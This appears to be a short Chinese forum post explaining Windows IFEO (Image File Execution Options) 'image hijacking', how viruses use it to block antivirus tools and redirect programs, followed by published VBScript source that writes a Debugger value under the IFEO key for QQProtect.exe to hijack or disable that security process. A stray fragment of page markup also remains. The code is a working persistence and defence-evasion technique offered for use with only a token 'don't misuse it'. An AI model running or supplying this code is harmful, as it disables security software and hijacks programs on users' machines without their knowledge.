VB IFEO镜像劫持技术

什么是映像劫持

如果你明明双击执行了程序A，但运行起来的却是程序B（比如，明明运行qq，但QQ没起来，反而跳出个Foxmail），那么恭喜你，你应该中了某类采用了IFEO技术的病毒了。

所谓IFEO，其实是Image File Execution Option的缩写，其实就是个注册表项：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

近期被很多病毒都利用该技术来：

a.阻止杀毒软件和专杀工具的运行；

b.重定向一些常用程序到病毒体，一旦运行这些程序，病毒再度死灰复燃

镜像劫持相信大家都不陌生，以前有个叫“AV终结者”利用IFEO镜像劫持技术搞垮了安全软件.

Dim a

Set a = CreateObject("wscript.shell")

a.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQProtect.exe\Debugger", "", "REG_SZ"

图片：141083.jpg

500){this.width = 500;}">

本人表达能力很差不好意思哦，这里我公布一下劫持的源代码，千万不要拿去淫荡。